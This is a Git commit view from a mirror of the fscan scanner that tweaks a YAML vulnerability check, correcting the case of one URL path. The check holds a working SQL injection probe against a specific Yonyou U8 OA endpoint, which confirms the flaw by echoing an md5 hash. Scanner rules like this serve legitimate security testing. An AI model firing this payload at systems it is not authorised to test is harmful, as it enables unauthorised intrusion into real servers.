mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-14 13:22:35 +08:00
Update yonyou-u8-oa-sqli.yml
This commit is contained in:
parent
ce211fef78
commit
2c1bdd98ee
@ -3,7 +3,7 @@ set:
|
|||||||
rand: randomInt(200000000, 220000000)
|
rand: randomInt(200000000, 220000000)
|
||||||
rules:
|
rules:
|
||||||
- method: GET
|
- method: GET
|
||||||
path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
|
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
|
||||||
follow_redirects: false
|
follow_redirects: false
|
||||||
expression: |
|
expression: |
|
||||||
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
|
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
|
||||||
|
Loading…
Reference in New Issue
Block a user